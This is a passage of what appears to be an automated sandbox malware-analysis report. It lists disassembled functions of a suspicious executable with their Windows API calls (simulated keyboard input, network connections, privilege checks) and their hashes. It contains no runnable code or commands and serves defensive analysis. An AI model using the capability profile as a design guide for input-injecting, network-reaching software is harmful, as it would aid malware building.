                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID:
                                          • API String ID: 4218353326-0
                                          • Opcode ID: 247b355ae3f5f6962a186621316b1bf5089084c1c17526b5b2b783a8c4d59f2a
                                          • Instruction ID: a83e3a92504934b1ec3e73dfb51a1823a378ae5dba546729e3dbe8e4403e431b
                                          • Opcode Fuzzy Hash: 247b355ae3f5f6962a186621316b1bf5089084c1c17526b5b2b783a8c4d59f2a
                                          • Instruction Fuzzy Hash: 2241B231A40108ABCB18EBB4ECD1FBEB7E9EF48354F149165F919A7292DB30AD40C761
                                          Function 00E5BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E5BB09
                                          • GetLastError.KERNEL32(?,00000000), ref: 00E5BB2F
                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E5BB54
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E5BB80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                          • String ID:
                                          • API String ID: 3321077145-0
                                          • Opcode ID: 853972d08015bf9455a66372f47706f93fb8b4e3c191bc2d7ed58de8d0d98ed3
                                          • Instruction ID: c7596d122e02ae27053bd876d9902486785638b8179e4db521ce75b8a565acf8
                                          • Opcode Fuzzy Hash: 853972d08015bf9455a66372f47706f93fb8b4e3c191bc2d7ed58de8d0d98ed3
                                          • Instruction Fuzzy Hash: 53412B35600514DFCB10EF25C594A69BBE1EF89314B0AD498ED4AAB362CB70FD45CBA1
                                          Function 00E78AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                          Download Yara Rule
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E78B4D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: cd84c8d32b3fc0fe5400b4b3fabd9d5f9f7afe0b7851e24eb574dff0bb6aec96
                                          • Instruction ID: 562b9b0d1555fd14a26a1ccbeb478407dfeb54eaba364e1b6da541847501eb80
                                          • Opcode Fuzzy Hash: cd84c8d32b3fc0fe5400b4b3fabd9d5f9f7afe0b7851e24eb574dff0bb6aec96
                                          • Instruction Fuzzy Hash: 9A31F678680204BFEB248E28CD9DFE93764EB25314F24D616FA49F62A0CF30AD409751
                                          Function 00E7ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 00E7AE1A
                                          • GetWindowRect.USER32(?,?), ref: 00E7AE90
                                          • PtInRect.USER32(?,?,00E7C304), ref: 00E7AEA0
                                          • MessageBeep.USER32(00000000), ref: 00E7AF11
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID:
                                          • API String ID: 1352109105-0
                                          • Opcode ID: 4763357d643340fe52899da50e00b08ea104458d57801bd00e4e18ee4bc4ba15
                                          • Instruction ID: 3151d0022767c8ba509b145040405ea69586c75948db84584229c9ea2f960e7a
                                          • Opcode Fuzzy Hash: 4763357d643340fe52899da50e00b08ea104458d57801bd00e4e18ee4bc4ba15
                                          • Instruction Fuzzy Hash: C7418C71600119DFCB15CF59D884AAEBBF5FB88340F18D1B9E81CAB261D730A885DB92
                                          Function 00E50FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E51037
                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E51053
                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E510B9
                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E5110B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: d803d6066353f6727fb7afc3587c61dcdee02ec12ad70a04befd7d208337436b
                                          • Instruction ID: cb6115feaa12160d12bb14318210d78864e90546196f592108be47bec3d0ceb4
                                          • Opcode Fuzzy Hash: d803d6066353f6727fb7afc3587c61dcdee02ec12ad70a04befd7d208337436b
                                          • Instruction Fuzzy Hash: 5B315930E40688AEFB30CA668C05BFDBBA9AB44316F045A9AFD90721D0C3748DCC8751
                                          Function 00E51121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00E51176
                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E51192
                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E511F1
                                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00E51243
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: 10f445bc565a913a8a6ab4e684a54e4200874ee2b5d793d56e44a2d04c8048c1
                                          • Instruction ID: 73e884f0baef8df83c9153310a89bdbd8aa7cdf3f2294a4c902073e1e3d2f04b
                                          • Opcode Fuzzy Hash: 10f445bc565a913a8a6ab4e684a54e4200874ee2b5d793d56e44a2d04c8048c1
                                          • Instruction Fuzzy Hash: 28316830941A089EEF20CA658C047FE7BAAAB49316F046BDAF981B21E1C3744D8C9761
                                          Function 00E26415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E2644B
                                          • __isleadbyte_l.LIBCMT ref: 00E26479
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E264A7
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E264DD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: 78deba1e27513661ba4d687f20c4ed55dbdfc29b985a2c7170baa640a3d1a26c
                                          • Instruction ID: 948a85215800ca5a05dc88d804d504e9ed59eea4e2e143ee1a2a53489047d179
                                          • Opcode Fuzzy Hash: 78deba1e27513661ba4d687f20c4ed55dbdfc29b985a2c7170baa640a3d1a26c
                                          • Instruction Fuzzy Hash: 78310430600266EFDB21AF75D844BBA7BE5FF00314F155229E8B4A71A1D731D890CB90
                                          Function 00E75175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 00E75189
                                            • Part of subcall function 00E5387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E53897
                                            • Part of subcall function 00E5387D: GetCurrentThreadId.KERNEL32 ref: 00E5389E
                                            • Part of subcall function 00E5387D: AttachThreadInput.USER32(00000000,?,00E552A7), ref: 00E538A5
                                          • GetCaretPos.USER32(?), ref: 00E7519A
                                          • ClientToScreen.USER32(00000000,?), ref: 00E751D5
                                          • GetForegroundWindow.USER32 ref: 00E751DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                          • String ID:
                                          • API String ID: 2759813231-0
                                          • Opcode ID: 025dce7a12799c52407b6605e0b12867a3e86f049dc13c01cfb2ee77c91aa3c2
                                          • Instruction ID: beec4a3e02863b0dff5a0ae6770959fa97cc6989b9188355286b977c4d202d6a
                                          • Opcode Fuzzy Hash: 025dce7a12799c52407b6605e0b12867a3e86f049dc13c01cfb2ee77c91aa3c2
                                          • Instruction Fuzzy Hash: D9311C71D00108AFDB04EFA5C845AEFF7F9EF98300B11806AE915E7241EA759E45CBA0
                                          Function 00E7C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • GetCursorPos.USER32(?), ref: 00E7C7C2
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E2BBFB,?,?,?,?,?), ref: 00E7C7D7
                                          • GetCursorPos.USER32(?), ref: 00E7C824
                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E2BBFB,?,?,?), ref: 00E7C85E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                          • String ID:
                                          • API String ID: 2864067406-0
                                          • Opcode ID: 22889219b1ab49142235f4ac9ae781fb990fc2cf3b85f8d044c17826fba31c21
                                          • Instruction ID: 65b65d22a4405bf2254606d163935a491746050068a2c136a1d20c3ddbdee3b8
                                          • Opcode Fuzzy Hash: 22889219b1ab49142235f4ac9ae781fb990fc2cf3b85f8d044c17826fba31c21
                                          • Instruction Fuzzy Hash: E831E435600018AFDB19CF59C898EFA7BBAEB09310F148169F909AB261C731AE51DF61
                                          Function 00E10BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                          Download Yara Rule
                                          APIs
                                          • __setmode.LIBCMT ref: 00E10BF2
                                            • Part of subcall function 00DF5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E57B20,?,?,00000000), ref: 00DF5B8C
                                            • Part of subcall function 00DF5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E57B20,?,?,00000000,?,?), ref: 00DF5BB0
                                          • _fprintf.LIBCMT ref: 00E10C29
                                          • OutputDebugStringW.KERNEL32(?), ref: 00E46331
                                            • Part of subcall function 00E14CDA: _flsall.LIBCMT ref: 00E14CF3
                                          • __setmode.LIBCMT ref: 00E10C5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                          • String ID:
                                          • API String ID: 521402451-0
                                          • Opcode ID: 0f5a62a18f96bba368df3a87a0595318ce0dcaf88da147ab44eb709d29093ded
                                          • Instruction ID: 5c6daddad412ef9fc5c10d1e9d834f0274e40c994161dae1c9e7451199d70430
                                          • Opcode Fuzzy Hash: 0f5a62a18f96bba368df3a87a0595318ce0dcaf88da147ab44eb709d29093ded
                                          • Instruction Fuzzy Hash: C7110AB19042087EDB04B7B4AC439FEBBA9DF85320F14615AF208772D2DE615DC68BE5
                                          Function 00E48B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E48652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E48669
                                            • Part of subcall function 00E48652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E48673
                                            • Part of subcall function 00E48652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E48682
                                            • Part of subcall function 00E48652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E48689
                                            • Part of subcall function 00E48652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E4869F
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E48BEB
                                          • _memcmp.LIBCMT ref: 00E48C0E
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E48C44
                                          • HeapFree.KERNEL32(00000000), ref: 00E48C4B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                          • String ID:
                                          • API String ID: 1592001646-0
                                          • Opcode ID: 469991a2a2b3346d49d1950aad0d296307a1e3a671cd7e665293e0d8488340d8
                                          • Instruction ID: d7547712d95a55f013c121e41ff5651195597b6251eb1d28497439d841cc892a
                                          • Opcode Fuzzy Hash: 469991a2a2b3346d49d1950aad0d296307a1e3a671cd7e665293e0d8488340d8
                                          • Instruction Fuzzy Hash: F7218971E02208AFCB00CFA4DA84BEEB7B8EF50348F044099E458B7240DB31AA46CB61
                                          Function 00E61A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E61A97
                                            • Part of subcall function 00E61B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E61B40
                                            • Part of subcall function 00E61B21: InternetCloseHandle.WININET(00000000), ref: 00E61BDD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Internet$CloseConnectHandleOpen
                                          • String ID:
                                          • API String ID: 1463438336-0
                                          • Opcode ID: dbf4ac94316f6d7f5457ec1d6a2dd1a7d9c6854edd82ddb6d1e5c0f984949e33
                                          • Instruction ID: b565625cb867f3c2b36936864ec16906deb3850f127dee8959624890e60e3cf1
                                          • Opcode Fuzzy Hash: dbf4ac94316f6d7f5457ec1d6a2dd1a7d9c6854edd82ddb6d1e5c0f984949e33
                                          • Instruction Fuzzy Hash: 4121D435280601BFDB169F60EC05FBABBADFF44781F18101EFA15A6550E731E8149B90
                                          Function 00E4E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E4F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E4E1C4,?,?,?,00E4EFB7,00000000,000000EF,00000119,?,?), ref: 00E4F5BC
                                            • Part of subcall function 00E4F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00E4F5E2
                                            • Part of subcall function 00E4F5AD: lstrcmpiW.KERNEL32(00000000,?,00E4E1C4,?,?,?,00E4EFB7,00000000,000000EF,00000119,?,?), ref: 00E4F613
                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E4EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E4E1DD
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00E4E203
                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E4EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E4E237
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: lstrcmpilstrcpylstrlen
                                          • String ID: cdecl
                                          • API String ID: 4031866154-3896280584
                                          • Opcode ID: bf817edd4ae59eae4d1fb2c7dea9a94ebbed8069f159a1f2b34d27d3e8591f8f
                                          • Instruction ID: ee9e50414090583b39823e013c5f09f265695781833c1a08b7344956fbcd5ec3
                                          • Opcode Fuzzy Hash: bf817edd4ae59eae4d1fb2c7dea9a94ebbed8069f159a1f2b34d27d3e8591f8f
                                          • Instruction Fuzzy Hash: 7011D036200301EFCB25AF74EC45D7A77A8FF89350B40502AF806DB260EBB1A891D7A4
                                          Function 00E25332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00E25351
                                            • Part of subcall function 00E1594C: __FF_MSGBANNER.LIBCMT ref: 00E15963
                                            • Part of subcall function 00E1594C: __NMSG_WRITE.LIBCMT ref: 00E1596A
                                            • Part of subcall function 00E1594C: RtlAllocateHeap.NTDLL(01780000,00000000,00000001,00000000,?,?,?,00E11013,?), ref: 00E1598F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: c971f92c3def18a228d13f201f992c9ed601af7c2e8de7aeadc6612edfee8f51
                                          • Instruction ID: 4220e02e864907e2bcd67f4bc480002ebf73a76df914d84a7ec4b885a3a44e7f
                                          • Opcode Fuzzy Hash: c971f92c3def18a228d13f201f992c9ed601af7c2e8de7aeadc6612edfee8f51
                                          • Instruction Fuzzy Hash: CC11E373504B25AFCF21AF70BE456EE37D89F143A4F20352AF949BA191DE7189818790
                                          Function 00E6667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E57B20,?,?,00000000), ref: 00DF5B8C
                                            • Part of subcall function 00DF5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E57B20,?,?,00000000,?,?), ref: 00DF5BB0
                                          • gethostbyname.WSOCK32(?,?,?), ref: 00E666AC
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00E666B7
                                          • _memmove.LIBCMT ref: 00E666E4
                                          • inet_ntoa.WSOCK32(?), ref: 00E666EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                          • String ID:
                                          • API String ID: 1504782959-0
                                          • Opcode ID: dcf3593acac420f22bc55f2dd8e59af2df8d28a0f5809a2a89cf553d3af58cc0
                                          • Instruction ID: 975c5673264172e854fda73f0e56f46091528429f2393e6044451f3715108037
                                          • Opcode Fuzzy Hash: dcf3593acac420f22bc55f2dd8e59af2df8d28a0f5809a2a89cf553d3af58cc0
                                          • Instruction Fuzzy Hash: 80119035900508AFCB04EBA0ED96DEEB7B8EF04310B158065F606B7161DF30AE44CB71
                                          Function 00E49023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00E49043
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E49055
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E4906B
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E49086
                                          Memory Dump Source
